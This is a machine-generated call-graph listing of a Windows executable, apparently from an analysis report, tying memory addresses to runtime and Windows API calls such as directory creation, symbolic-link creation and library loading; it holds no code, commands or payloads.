17343->17359 17344->17358 17345->17358 17346->17358 17347->17343 17348 7ff7f91f36a0 17347->17348 17347->17358 17352 7ff7f91f4430 47 API calls 17348->17352 17348->17359 17350 7ff7f91f1fd0 38 API calls 17349->17350 17349->17359 17350->17358 17351->17339 17353 7ff7f91f36e0 17351->17353 17352->17358 17355 7ff7f91f45c8 37 API calls 17353->17355 17353->17359 17354 7ff7f91ec5c0 _log10_special 8 API calls 17356 7ff7f91f39f3 17354->17356 17355->17358 17356->17302 17357 7ff7f91fe8c8 47 API calls 17357->17358 17358->17357 17358->17359 17359->17354 17411 7ff7f91f0d84 17360->17411 17364 7ff7f91f3f96 17363->17364 17365 7ff7f91f0bf0 12 API calls 17364->17365 17366 7ff7f91f3fde 17365->17366 17367 7ff7f91fe5e0 46 API calls 17366->17367 17368 7ff7f91f40b1 17367->17368 17369 7ff7f91f4830 45 API calls 17368->17369 17372 7ff7f91f40d3 17368->17372 17369->17372 17370 7ff7f91f4830 45 API calls 17371 7ff7f91f415c 17370->17371 17371->17328 17372->17370 17372->17371 17372->17372 17374 7ff7f91f4448 17373->17374 17376 7ff7f91f44b0 17373->17376 17375 7ff7f91fe8c8 47 API calls 17374->17375 17374->17376 17375->17376 17376->17328 17378 7ff7f91f1bf3 17377->17378 17379 7ff7f91f1c22 17378->17379 17381 7ff7f91f1cdf 17378->17381 17380 7ff7f91f0bf0 12 API calls 17379->17380 17383 7ff7f91f1c5f 17379->17383 17380->17383 17382 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17381->17382 17382->17383 17383->17328 17385 7ff7f91f17e3 17384->17385 17386 7ff7f91f1812 17385->17386 17388 7ff7f91f18cf 17385->17388 17387 7ff7f91f0bf0 12 API calls 17386->17387 17390 7ff7f91f184f 17386->17390 17387->17390 17389 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17388->17389 17389->17390 17390->17328 17392 7ff7f91f2003 17391->17392 17393 7ff7f91f2032 17392->17393 17395 7ff7f91f20ef 17392->17395 17394 7ff7f91f0bf0 12 API calls 17393->17394 17397 7ff7f91f206f 17393->17397 17394->17397 17396 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17395->17396 17396->17397 17397->17328 17399 7ff7f91fe8f0 17398->17399 17400 7ff7f91fe935 17399->17400 17401 7ff7f91f4830 45 API calls 17399->17401 17403 7ff7f91fe91e memcpy_s 17399->17403 17407 7ff7f91fe8f5 memcpy_s 17399->17407 17400->17403 17400->17407 17408 7ff7f9200858 17400->17408 17401->17400 17402 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17402->17407 17403->17402 17403->17407 17407->17328 17410 7ff7f920087c WideCharToMultiByte 17408->17410 17412 7ff7f91f0dc3 17411->17412 17413 7ff7f91f0db1 17411->17413 17416 7ff7f91f0dd0 17412->17416 17419 7ff7f91f0e0d 17412->17419 17414 7ff7f91f4f78 _get_daylight 11 API calls 17413->17414 17415 7ff7f91f0db6 17414->17415 17417 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17415->17417 17418 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17416->17418 17423 7ff7f91f0dc1 17417->17423 17418->17423 17420 7ff7f91f0eb6 17419->17420 17421 7ff7f91f4f78 _get_daylight 11 API calls 17419->17421 17422 7ff7f91f4f78 _get_daylight 11 API calls 17420->17422 17420->17423 17424 7ff7f91f0eab 17421->17424 17425 7ff7f91f0f60 17422->17425 17423->17302 17426 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17424->17426 17427 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17425->17427 17426->17420 17427->17423 17432 7ff7f91fecad 17428->17432 17429 7ff7f91fecb2 17430 7ff7f91f524d 17429->17430 17431 7ff7f91f4f78 _get_daylight 11 API calls 17429->17431 17430->17278 17430->17279 17433 7ff7f91fecbc 17431->17433 17432->17429 17432->17430 17435 7ff7f91fecfc 17432->17435 17434 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17433->17434 17434->17430 17435->17430 17436 7ff7f91f4f78 _get_daylight 11 API calls 17435->17436 17436->17433 17438 7ff7f91e87a1 GetTokenInformation 17437->17438 17440 7ff7f91e8823 __std_exception_destroy 17437->17440 17439 7ff7f91e87c2 GetLastError 17438->17439 17441 7ff7f91e87cd 17438->17441 17439->17440 17439->17441 17442 7ff7f91e8836 CloseHandle 17440->17442 17443 7ff7f91e883c 17440->17443 17441->17440 17444 7ff7f91e87e9 GetTokenInformation 17441->17444 17442->17443 17443->16569 17444->17440 17445 7ff7f91e880c 17444->17445 17445->17440 17446 7ff7f91e8816 ConvertSidToStringSidW 17445->17446 17446->17440 17448 7ff7f91ec8c0 17447->17448 17449 7ff7f91e2b74 GetCurrentProcessId 17448->17449 17450 7ff7f91e26b0 48 API calls 17449->17450 17451 7ff7f91e2bc7 17450->17451 17452 7ff7f91f4c48 48 API calls 17451->17452 17453 7ff7f91e2c10 MessageBoxW 17452->17453 17454 7ff7f91ec5c0 _log10_special 8 API calls 17453->17454 17455 7ff7f91e2c40 17454->17455 17455->16580 17457 7ff7f91e25e5 17456->17457 17458 7ff7f91f4c48 48 API calls 17457->17458 17459 7ff7f91e2604 17458->17459 17459->16594 17505 7ff7f91f8804 17460->17505 17464 7ff7f91e81cc 17463->17464 17465 7ff7f91e9400 2 API calls 17464->17465 17466 7ff7f91e81eb 17465->17466 17467 7ff7f91e8206 ExpandEnvironmentStringsW 17466->17467 17468 7ff7f91e81f3 17466->17468 17469 7ff7f91e822c __std_exception_destroy 17467->17469 17470 7ff7f91e2810 49 API calls 17468->17470 17472 7ff7f91e8230 17469->17472 17474 7ff7f91e8243 17469->17474 17471 7ff7f91e81ff __std_exception_destroy 17470->17471 17475 7ff7f91ec5c0 _log10_special 8 API calls 17471->17475 17473 7ff7f91e2810 49 API calls 17472->17473 17473->17471 17477 7ff7f91e8251 GetDriveTypeW 17474->17477 17478 7ff7f91e82af 17474->17478 17476 7ff7f91e839f 17475->17476 17476->16593 17495 7ff7f91f82a8 17476->17495 17482 7ff7f91e8285 17477->17482 17483 7ff7f91e82a0 17477->17483 17643 7ff7f91f7e78 17478->17643 17481 7ff7f91e82c1 17485 7ff7f91e82c9 17481->17485 17488 7ff7f91e82dc 17481->17488 17486 7ff7f91e2810 49 API calls 17482->17486 17636 7ff7f91f79dc 17483->17636 17487 7ff7f91e2810 49 API calls 17485->17487 17486->17471 17487->17471 17489 7ff7f91e833e CreateDirectoryW 17488->17489 17491 7ff7f91e26b0 48 API calls 17488->17491 17489->17471 17490 7ff7f91e834d GetLastError 17489->17490 17490->17471 17492 7ff7f91e835a GetLastError 17490->17492 17493 7ff7f91e8318 CreateDirectoryW 17491->17493 17494 7ff7f91e2c50 51 API calls 17492->17494 17493->17488 17494->17471 17496 7ff7f91f82b5 17495->17496 17497 7ff7f91f82c8 17495->17497 17498 7ff7f91f4f78 _get_daylight 11 API calls 17496->17498 17744 7ff7f91f7f2c 17497->17744 17500 7ff7f91f82ba 17498->17500 17502 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17500->17502 17503 7ff7f91f82c6 17502->17503 17503->16597 17546 7ff7f92015c8 17505->17546 17605 7ff7f9201340 17546->17605 17626 7ff7f9200348 EnterCriticalSection 17605->17626 17637 7ff7f91f7a2d 17636->17637 17638 7ff7f91f79fa 17636->17638 17637->17471 17638->17637 17655 7ff7f92004e4 17638->17655 17641 7ff7f91fa970 _isindst 17 API calls 17642 7ff7f91f7a5d 17641->17642 17644 7ff7f91f7e94 17643->17644 17645 7ff7f91f7f02 17643->17645 17644->17645 17647 7ff7f91f7e99 17644->17647 17689 7ff7f9200830 17645->17689 17648 7ff7f91f7eb1 17647->17648 17649 7ff7f91f7ece 17647->17649 17664 7ff7f91f7c48 GetFullPathNameW 17648->17664 17672 7ff7f91f7cbc GetFullPathNameW 17649->17672 17654 7ff7f91f7ec6 __std_exception_destroy 17654->17481 17656 7ff7f92004f1 17655->17656 17657 7ff7f92004fb 17655->17657 17656->17657 17662 7ff7f9200517 17656->17662 17658 7ff7f91f4f78 _get_daylight 11 API calls 17657->17658 17659 7ff7f9200503 17658->17659 17660 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17659->17660 17661 7ff7f91f7a29 17660->17661 17661->17637 17661->17641 17662->17661 17663 7ff7f91f4f78 _get_daylight 11 API calls 17662->17663 17663->17659 17665 7ff7f91f7c6e GetLastError 17664->17665 17668 7ff7f91f7c84 17664->17668 17666 7ff7f91f4eec _fread_nolock 11 API calls 17665->17666 17667 7ff7f91f7c7b 17666->17667 17670 7ff7f91f4f78 _get_daylight 11 API calls 17667->17670 17669 7ff7f91f4f78 _get_daylight 11 API calls 17668->17669 17671 7ff7f91f7c80 17668->17671 17669->17671 17670->17671 17671->17654 17673 7ff7f91f7cef GetLastError 17672->17673 17678 7ff7f91f7d05 __std_exception_destroy 17672->17678 17674 7ff7f91f4eec _fread_nolock 11 API calls 17673->17674 17675 7ff7f91f7cfc 17674->17675 17677 7ff7f91f4f78 _get_daylight 11 API calls 17675->17677 17676 7ff7f91f7d01 17680 7ff7f91f7d94 17676->17680 17677->17676 17678->17676 17679 7ff7f91f7d5f GetFullPathNameW 17678->17679 17679->17673 17679->17676 17681 7ff7f91f7e08 memcpy_s 17680->17681 17683 7ff7f91f7dbd memcpy_s 17680->17683 17681->17654 17682 7ff7f91f7df1 17684 7ff7f91f4f78 _get_daylight 11 API calls 17682->17684 17683->17681 17683->17682 17686 7ff7f91f7e2a 17683->17686 17685 7ff7f91f7df6 17684->17685 17687 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17685->17687 17686->17681 17688 7ff7f91f4f78 _get_daylight 11 API calls 17686->17688 17687->17681 17688->17685 17692 7ff7f9200640 17689->17692 17693 7ff7f9200682 17692->17693 17694 7ff7f920066b 17692->17694 17696 7ff7f9200686 17693->17696 17697 7ff7f92006a7 17693->17697 17695 7ff7f91f4f78 _get_daylight 11 API calls 17694->17695 17699 7ff7f9200670 17695->17699 17718 7ff7f92007ac 17696->17718 17730 7ff7f91ff628 17697->17730 17703 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17699->17703 17701 7ff7f92006ac 17706 7ff7f9200751 17701->17706 17713 7ff7f92006d3 17701->17713 17717 7ff7f920067b __std_exception_destroy 17703->17717 17704 7ff7f920068f 17705 7ff7f91f4f58 _fread_nolock 11 API calls 17704->17705 17707 7ff7f9200694 17705->17707 17706->17694 17709 7ff7f9200759 17706->17709 17708 7ff7f91f4f78 _get_daylight 11 API calls 17707->17708 17708->17699 17712 7ff7f91f7c48 13 API calls 17709->17712 17710 7ff7f91ec5c0 _log10_special 8 API calls 17711 7ff7f92007a1 17710->17711 17711->17654 17712->17717 17714 7ff7f91f7cbc 14 API calls 17713->17714 17715 7ff7f9200717 17714->17715 17715->17717 17717->17710 17719 7ff7f92007f6 17718->17719 17720 7ff7f92007c6 17718->17720 17721 7ff7f9200801 GetDriveTypeW 17719->17721 17723 7ff7f92007e1 17719->17723 17722 7ff7f91f4f58 _fread_nolock 11 API calls 17720->17722 17721->17723 17724 7ff7f92007cb 17722->17724 17726 7ff7f91ec5c0 _log10_special 8 API calls 17723->17726 17725 7ff7f91f4f78 _get_daylight 11 API calls 17724->17725 17727 7ff7f92007d6 17725->17727 17728 7ff7f920068b 17726->17728 17729 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17727->17729 17728->17701 17728->17704 17729->17723 17731 7ff7f920a540 memcpy_s 17730->17731 17732 7ff7f91ff65e GetCurrentDirectoryW 17731->17732 17733 7ff7f91ff675 17732->17733 17734 7ff7f91ff69c 17732->17734 17736 7ff7f91ec5c0 _log10_special 8 API calls 17733->17736 17735 7ff7f91fec08 _get_daylight 11 API calls 17734->17735 17737 7ff7f91ff6ab 17735->17737 17740 7ff7f91ff709 17736->17740 17738 7ff7f91ff6b5 GetCurrentDirectoryW 17737->17738 17739 7ff7f91ff6c4 17737->17739 17738->17739 17741 7ff7f91ff6c9 17738->17741 17742 7ff7f91f4f78 _get_daylight 11 API calls 17739->17742 17740->17701 17743 7ff7f91fa9b8 __free_lconv_mon 11 API calls 17741->17743 17742->17741 17743->17733 17751 7ff7f9200348 EnterCriticalSection 17744->17751 17753 7ff7f91e455a 17752->17753 17754 7ff7f91e9400 2 API calls 17753->17754 17755 7ff7f91e457f 17754->17755 17756 7ff7f91ec5c0 _log10_special 8 API calls 17755->17756 17757 7ff7f91e45a7 17756->17757 17757->16631 17759 7ff7f91e7e1e 17758->17759 17760 7ff7f91e7f42 17759->17760 17761 7ff7f91e1c80 49 API calls 17759->17761 17762 7ff7f91ec5c0 _log10_special 8 API calls 17760->17762 17766 7ff7f91e7ea5 17761->17766 17763 7ff7f91e7f73 17762->17763 17763->16631 17764 7ff7f91e1c80 49 API calls 17764->17766 17765 7ff7f91e4550 10 API calls 17765->17766 17766->17760 17766->17764 17766->17765 17767 7ff7f91e7efb 17766->17767 17768 7ff7f91e9400 2 API calls 17767->17768 17769 7ff7f91e7f13 CreateDirectoryW 17768->17769 17769->17760 17769->17766 17771 7ff7f91e1613 17770->17771 17772 7ff7f91e1637 17770->17772 17891 7ff7f91e1050 17771->17891 17773 7ff7f91e45b0 108 API calls 17772->17773 17775 7ff7f91e164b 17773->17775 17777 7ff7f91e1653 17775->17777 17778 7ff7f91e1682 17775->17778 17776 7ff7f91e1618 17779 7ff7f91e162e 17776->17779 17780 7ff7f91e2710 54 API calls 17776->17780 17781 7ff7f91f4f78 _get_daylight 11 API calls 17777->17781 17782 7ff7f91e45b0 108 API calls 17778->17782 17779->16631 17780->17779 17783 7ff7f91e1658 17781->17783 17784 7ff7f91e1696 17782->17784 17785 7ff7f91e2910 54 API calls 17783->17785 17786 7ff7f91e169e 17784->17786 17787 7ff7f91e16b8 17784->17787 17789 7ff7f91e1671 17785->17789 17790 7ff7f91e2710 54 API calls 17786->17790 17788 7ff7f91f0744 73 API calls 17787->17788 17791 7ff7f91e16cd 17788->17791 17789->16631 17792 7ff7f91e16ae 17790->17792 17793 7ff7f91e16d1 17791->17793 17794 7ff7f91e16f9 17791->17794 17798 7ff7f91f00bc 74 API calls 17792->17798 17795 7ff7f91f4f78 _get_daylight 11 API calls 17793->17795 17796 7ff7f91e16ff 17794->17796 17797 7ff7f91e1717 17794->17797 17800 7ff7f91e16d6 17795->17800 17869 7ff7f91e1210 17796->17869 17803 7ff7f91e1761 17797->17803 17804 7ff7f91e1739 17797->17804 17799 7ff7f91e1829 17798->17799 17799->16631 17802 7ff7f91e2910 54 API calls 17800->17802 17810 7ff7f91e16ef __std_exception_destroy 17802->17810 17809 7ff7f91f040c _fread_nolock 53 API calls 17803->17809 17803->17810 17811 7ff7f91e17da 17803->17811 17815 7ff7f91e17c5 17803->17815 17922 7ff7f91f0b4c 17803->17922 17805 7ff7f91f4f78 _get_daylight 11 API calls 17804->17805 17807 7ff7f91e173e 17805->17807 17806 7ff7f91f00bc 74 API calls 17806->17792 17808 7ff7f91e2910 54 API calls 17807->17808 17808->17810 17809->17803 17810->17806 17812 7ff7f91f4f78 _get_daylight 11 API calls 17811->17812 17814 7ff7f91e17ca 17812->17814 17816 7ff7f91e2910 54 API calls 17814->17816 17817 7ff7f91f4f78 _get_daylight 11 API calls 17815->17817 17816->17810 17817->17814 17819 7ff7f91e7134 17818->17819 17820 7ff7f91e717b 17818->17820 17819->17820 17955 7ff7f91f5094 17819->17955 17820->16631 17823 7ff7f91e4191 17822->17823 17824 7ff7f91e44d0 49 API calls 17823->17824 17825 7ff7f91e41cb 17824->17825 17826 7ff7f91e44d0 49 API calls 17825->17826 17827 7ff7f91e41db 17826->17827 17828 7ff7f91e422c 17827->17828 17829 7ff7f91e41fd 17827->17829 17831 7ff7f91e4100 51 API calls 17828->17831 17986 7ff7f91e4100 17829->17986 17832 7ff7f91e422a 17831->17832 17833 7ff7f91e428c 17832->17833 17834 7ff7f91e4257 17832->17834 17836 7ff7f91e4100 51 API calls 17833->17836 17993 7ff7f91e7ce0 17834->17993 17838 7ff7f91e42b0 17836->17838 17841 7ff7f91e4302 17838->17841 17843 7ff7f91e4100 51 API calls 17838->17843 17839 7ff7f91e4287 17844 7ff7f91ec5c0 _log10_special 8 API calls 17839->17844 17840 7ff7f91e4383 17846 7ff7f91e1950 115 API calls 17840->17846 17841->17840 17853 7ff7f91e437c 17841->17853 17854 7ff7f91e4307 17841->17854 17857 7ff7f91e436b 17841->17857 17842 7ff7f91e2710 54 API calls 17842->17839 17845 7ff7f91e42d9 17843->17845 17848 7ff7f91e4425 17844->17848 17845->17841 17851 7ff7f91e4100 51 API calls 17845->17851 17847 7ff7f91e438d 17846->17847 17849 7ff7f91e4395 17847->17849 17850 7ff7f91e43ee 17847->17850 17848->16631 18019 7ff7f91e1840 17849->18019 17852 7ff7f91e2710 54 API calls 17850->17852 17851->17841 17852->17854 17853->17849 17853->17854 17858 7ff7f91e2710 54 API calls 17854->17858 17861 7ff7f91e2710 54 API calls 17857->17861 17858->17839 17859 7ff7f91e43c2 17863 7ff7f91e1600 118 API calls 17859->17863 17860 7ff7f91e43ac 17862 7ff7f91e2710 54 API calls 17860->17862 17861->17854 17862->17839 17864 7ff7f91e43d0 17863->17864 17864->17839 17865 7ff7f91e2710 54 API calls 17864->17865 17865->17839 17867 7ff7f91e1c80 49 API calls 17866->17867 17868 7ff7f91e4464 17867->17868 17868->16631 17870 7ff7f91e1268 17869->17870 17871 7ff7f91e126f 17870->17871 17872 7ff7f91e1297 17870->17872 17873 7ff7f91e2710 54 API calls 17871->17873 17875 7ff7f91e12d4 17872->17875 17876 7ff7f91e12b1 17872->17876 17874 7ff7f91e1282 17873->17874 17874->17810 17879 7ff7f91e12e6 17875->17879 17885 7ff7f91e1309 memcpy_s 17875->17885 17877 7ff7f91f4f78 _get_daylight 11 API calls 17876->17877 17878 7ff7f91e12b6 17877->17878 17880 7ff7f91e2910 54 API calls 17878->17880 17881 7ff7f91f4f78 _get_daylight 11 API calls 17879->17881 17886 7ff7f91e12cf __std_exception_destroy 17880->17886 17882 7ff7f91e12eb 17881->17882 17884 7ff7f91e2910 54 API calls 17882->17884 17883 7ff7f91f040c _fread_nolock 53 API calls 17883->17885 17884->17886 17885->17883 17885->17886 17888 7ff7f91f0b4c 76 API calls 17885->17888 17889 7ff7f91e13cf 17885->17889 17890 7ff7f91f0180 37 API calls 17885->17890 17886->17810 17887 7ff7f91e2710 54 API calls 17887->17886 17888->17885 17889->17887 17890->17885 17892 7ff7f91e45b0 108 API calls 17891->17892 17893 7ff7f91e108c 17892->17893 17894 7ff7f91e1094 17893->17894 17895 7ff7f91e10a9 17893->17895 17896 7ff7f91e2710 54 API calls 17894->17896 17897 7ff7f91f0744 73 API calls 17895->17897 17903 7ff7f91e10a4 __std_exception_destroy 17896->17903 17898 7ff7f91e10bf 17897->17898 17899 7ff7f91e10c3 17898->17899 17900 7ff7f91e10e6 17898->17900 17901 7ff7f91f4f78 _get_daylight 11 API calls 17899->17901 17905 7ff7f91e1122 17900->17905 17906 7ff7f91e10f7 17900->17906 17902 7ff7f91e10c8 17901->17902 17904 7ff7f91e2910 54 API calls 17902->17904 17903->17776 17915 7ff7f91e10e1 __std_exception_destroy 17904->17915 17908 7ff7f91e1129 17905->17908 17911 7ff7f91e113c 17905->17911 17907 7ff7f91f4f78 _get_daylight 11 API calls 17906->17907 17909 7ff7f91e1100 17907->17909 17910 7ff7f91e1210 92 API calls 17908->17910 17912 7ff7f91e2910 54 API calls 17909->17912 17910->17915 17914 7ff7f91f040c _fread_nolock 53 API calls 17911->17914 17911->17915 17917 7ff7f91e11ed 17911->17917 17912->17915 17913 7ff7f91f00bc 74 API calls 17916 7ff7f91e11b4 17913->17916 17914->17911 17915->17913 17916->17903 17926 7ff7f91e46e0 17916->17926 17919 7ff7f91f4f78 _get_daylight 11 API calls 17917->17919 17920 7ff7f91e11f2 17919->17920 17921 7ff7f91e2910 54 API calls 17920->17921 17921->17915 17923 7ff7f91f0b7c 17922->17923 17940 7ff7f91f089c 17923->17940 17925 7ff7f91f0b9a 17925->17803 17927 7ff7f91e46f0 17926->17927 17928 7ff7f91e9400 2 API calls 17927->17928 17929 7ff7f91e471b 17928->17929 17930 7ff7f91e9400 2 API calls 17929->17930 17939 7ff7f91e478e 17929->17939 17931 7ff7f91e4736 17930->17931 17934 7ff7f91e473b CreateSymbolicLinkW 17931->17934 17931->17939 17932 7ff7f91ec5c0 _log10_special 8 API calls 17933 7ff7f91e47a9 17932->17933 17933->17903 17935 7ff7f91e4765 17934->17935 17934->17939 17936 7ff7f91e476e GetLastError 17935->17936 17935->17939 17937 7ff7f91e4779 17936->17937 17936->17939 17938 7ff7f91e46e0 10 API calls 17937->17938 17938->17939 17939->17932 17941 7ff7f91f08bc 17940->17941 17946 7ff7f91f08e9 17940->17946 17942 7ff7f91f08c6 17941->17942 17943 7ff7f91f08f1 17941->17943 17941->17946 17944 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 17942->17944 17947 7ff7f91f07dc 17943->17947 17944->17946 17946->17925 17954 7ff7f91f54dc EnterCriticalSection 17947->17954 17956 7ff7f91f50a1 17955->17956 17957 7ff7f91f50ce 17955->17957 17958 7ff7f91f4f78 _get_daylight 11 API calls 17956->17958 17959 7ff7f91f5058 17956->17959 17960 7ff7f91f50f1 17957->17960 17963 7ff7f91f510d 17957->17963 17961 7ff7f91f50ab 17958->17961 17959->17819 17962 7ff7f91f4f78 _get_daylight 11 API calls 17960->17962 17964 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17961->17964 17965 7ff7f91f50f6 17962->17965 17970 7ff7f91f4fbc 17963->17970 17967 7ff7f91f50b6 17964->17967 17968 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 17965->17968 17967->17819 17969 7ff7f91f5101 17968->17969 17969->17819 17971 7ff7f91f4fe0 17970->17971 17972 7ff7f91f4fdb 17970->17972 17971->17972 17973 7ff7f91fb1c0 __GetCurrentState 45 API calls 17971->17973 17972->17969 17974 7ff7f91f4ffb 17973->17974 17978 7ff7f91fd9f4 17974->17978 17979 7ff7f91fda09 17978->17979 17981 7ff7f91f501e 17978->17981 17980 7ff7f9203374 45 API calls 17979->17980 17979->17981 17980->17981 17982 7ff7f91fda60 17981->17982 17983 7ff7f91fda75 17982->17983 17984 7ff7f91fda88 17982->17984 17983->17984 17985 7ff7f92026c0 45 API calls 17983->17985 17984->17972 17985->17984 17987 7ff7f91e4126 17986->17987 17988 7ff7f91f49f4 49 API calls 17987->17988 17989 7ff7f91e414c 17988->17989 17990 7ff7f91e415d 17989->17990 17991 7ff7f91e4550 10 API calls 17989->17991 17990->17832 17992 7ff7f91e416f 17991->17992 17992->17832 17994 7ff7f91e7cf5 17993->17994 17995 7ff7f91e45b0 108 API calls 17994->17995 17996 7ff7f91e7d1b 17995->17996 17997 7ff7f91e7d42 17996->17997 17998 7ff7f91e45b0 108 API calls 17996->17998 18000 7ff7f91ec5c0 _log10_special 8 API calls 17997->18000 17999 7ff7f91e7d32 17998->17999 18001 7ff7f91e7d4c 17999->18001 18002 7ff7f91e7d3d 17999->18002 18003 7ff7f91e4267 18000->18003 18023 7ff7f91f0154 18001->18023 18004 7ff7f91f00bc 74 API calls 18002->18004 18003->17839 18003->17842 18004->17997 18006 7ff7f91f00bc 74 API calls 18007 7ff7f91e7dd7 18006->18007 18010 7ff7f91f00bc 74 API calls 18007->18010 18008 7ff7f91f040c _fread_nolock 53 API calls 18009 7ff7f91e7d51 18008->18009 18009->18008 18011 7ff7f91e7db6 18009->18011 18012 7ff7f91f0b4c 76 API calls 18009->18012 18014 7ff7f91e7db1 18009->18014 18015 7ff7f91f0180 37 API calls 18009->18015 18017 7ff7f91e7daf 18009->18017 18018 7ff7f91f0154 37 API calls 18009->18018 18010->17997 18013 7ff7f91f0180 37 API calls 18011->18013 18012->18009 18013->18014 18014->18017 18029 7ff7f91f7388 18014->18029 18015->18009 18017->18006 18018->18009 18020 7ff7f91e18d5 18019->18020 18022 7ff7f91e1865 18019->18022 18020->17859 18020->17860 18021 7ff7f91f5094 45 API calls 18021->18022 18022->18020 18022->18021 18024 7ff7f91f016d 18023->18024 18025 7ff7f91f015d 18023->18025 18024->18009 18026 7ff7f91f4f78 _get_daylight 11 API calls 18025->18026 18027 7ff7f91f0162 18026->18027 18028 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 18027->18028 18028->18024 18030 7ff7f91f7390 18029->18030 18031 7ff7f91f73cd 18030->18031 18032 7ff7f91f73ac 18030->18032 18048 7ff7f91f54dc EnterCriticalSection 18031->18048 18033 7ff7f91f4f78 _get_daylight 11 API calls 18032->18033 18035 7ff7f91f73b1 18033->18035 18050 7ff7f91f5f38 18049->18050 18051 7ff7f91f5f5e 18050->18051 18054 7ff7f91f5f91 18050->18054 18052 7ff7f91f4f78 _get_daylight 11 API calls 18051->18052 18053 7ff7f91f5f63 18052->18053 18055 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 18053->18055 18056 7ff7f91f5fa4 18054->18056 18057 7ff7f91f5f97 18054->18057 18067 7ff7f91e4606 18055->18067 18068 7ff7f91fac98 18056->18068 18059 7ff7f91f4f78 _get_daylight 11 API calls 18057->18059 18059->18067 18067->16657 18081 7ff7f9200348 EnterCriticalSection 18068->18081 18442 7ff7f91f7968 18441->18442 18445 7ff7f91f7444 18442->18445 18444 7ff7f91f7981 18444->16667 18446 7ff7f91f745f 18445->18446 18447 7ff7f91f748e 18445->18447 18449 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 18446->18449 18455 7ff7f91f54dc EnterCriticalSection 18447->18455 18451 7ff7f91f747f 18449->18451 18451->18444 18457 7ff7f91efeb3 18456->18457 18458 7ff7f91efee1 18456->18458 18459 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 18457->18459 18461 7ff7f91efed3 18458->18461 18466 7ff7f91f54dc EnterCriticalSection 18458->18466 18459->18461 18461->16671 18468 7ff7f91e45b0 108 API calls 18467->18468 18469 7ff7f91e1493 18468->18469 18470 7ff7f91e14bc 18469->18470 18471 7ff7f91e149b 18469->18471 18473 7ff7f91f0744 73 API calls 18470->18473 18472 7ff7f91e2710 54 API calls 18471->18472 18474 7ff7f91e14ab 18472->18474 18475 7ff7f91e14d1 18473->18475 18474->16704 18476 7ff7f91e14d5 18475->18476 18477 7ff7f91e14f8 18475->18477 18478 7ff7f91f4f78 _get_daylight 11 API calls 18476->18478 18480 7ff7f91e1532 18477->18480 18481 7ff7f91e1508 18477->18481 18479 7ff7f91e14da 18478->18479 18482 7ff7f91e2910 54 API calls 18479->18482 18484 7ff7f91e1538 18480->18484 18492 7ff7f91e154b 18480->18492 18483 7ff7f91f4f78 _get_daylight 11 API calls 18481->18483 18489 7ff7f91e14f3 __std_exception_destroy 18482->18489 18485 7ff7f91e1510 18483->18485 18486 7ff7f91e1210 92 API calls 18484->18486 18487 7ff7f91e2910 54 API calls 18485->18487 18486->18489 18487->18489 18488 7ff7f91f00bc 74 API calls 18491 7ff7f91e15c4 18488->18491 18489->18488 18490 7ff7f91f040c _fread_nolock 53 API calls 18490->18492 18491->16704 18492->18489 18492->18490 18493 7ff7f91e15d6 18492->18493 18494 7ff7f91f4f78 _get_daylight 11 API calls 18493->18494 18495 7ff7f91e15db 18494->18495 18496 7ff7f91e2910 54 API calls 18495->18496 18496->18489 18498 7ff7f91e9400 2 API calls 18497->18498 18499 7ff7f91e9084 LoadLibraryExW 18498->18499 18500 7ff7f91e90a3 __std_exception_destroy 18499->18500 18500->16738 18502 7ff7f91e770b GetProcAddress 18501->18502 18503 7ff7f91e76d9 GetLastError 18501->18503 18504 7ff7f91e7736 GetProcAddress 18502->18504 18505 7ff7f91e7727 GetLastError 18502->18505 18506 7ff7f91e76e6 18503->18506 18505->18506 18574 7ff7f91e6365 18573->18574 18575 7ff7f91e1c80 49 API calls 18574->18575 18576 7ff7f91e63a1 18575->18576 18577 7ff7f91e63cd 18576->18577 18578 7ff7f91e63aa 18576->18578 18580 7ff7f91e4620 49 API calls 18577->18580 18579 7ff7f91e2710 54 API calls 18578->18579 18603 7ff7f91e63c3 18579->18603 18581 7ff7f91e63e5 18580->18581 18582 7ff7f91e6403 18581->18582 18584 7ff7f91e2710 54 API calls 18581->18584 18585 7ff7f91e4550 10 API calls 18582->18585 18583 7ff7f91ec5c0 _log10_special 8 API calls 18586 7ff7f91e336e 18583->18586 18584->18582 18587 7ff7f91e640d 18585->18587 18586->16778 18604 7ff7f91e64f0 18586->18604 18588 7ff7f91e641b 18587->18588 18590 7ff7f91e9070 3 API calls 18587->18590 18589 7ff7f91e4620 49 API calls 18588->18589 18591 7ff7f91e6434 18589->18591 18590->18588 18592 7ff7f91e6459 18591->18592 18593 7ff7f91e6439 18591->18593 18595 7ff7f91e9070 3 API calls 18592->18595 18594 7ff7f91e2710 54 API calls 18593->18594 18594->18603 18596 7ff7f91e6466 18595->18596 18597 7ff7f91e6472 18596->18597 18598 7ff7f91e64b1 18596->18598 18599 7ff7f91e9400 2 API calls 18597->18599 18663 7ff7f91e5820 GetProcAddress 18598->18663 18601 7ff7f91e648a GetLastError 18599->18601 18602 7ff7f91e2c50 51 API calls 18601->18602 18602->18603 18603->18583 18753 7ff7f91e53f0 18604->18753 18606 7ff7f91e6516 18607 7ff7f91e652f 18606->18607 18608 7ff7f91e651e 18606->18608 18760 7ff7f91e4c80 18607->18760 18609 7ff7f91e2710 54 API calls 18608->18609 18615 7ff7f91e652a 18609->18615 18612 7ff7f91e654c 18616 7ff7f91e655c 18612->18616 18618 7ff7f91e656d 18612->18618 18613 7ff7f91e653b 18614 7ff7f91e2710 54 API calls 18613->18614 18614->18615 18615->16774 18617 7ff7f91e2710 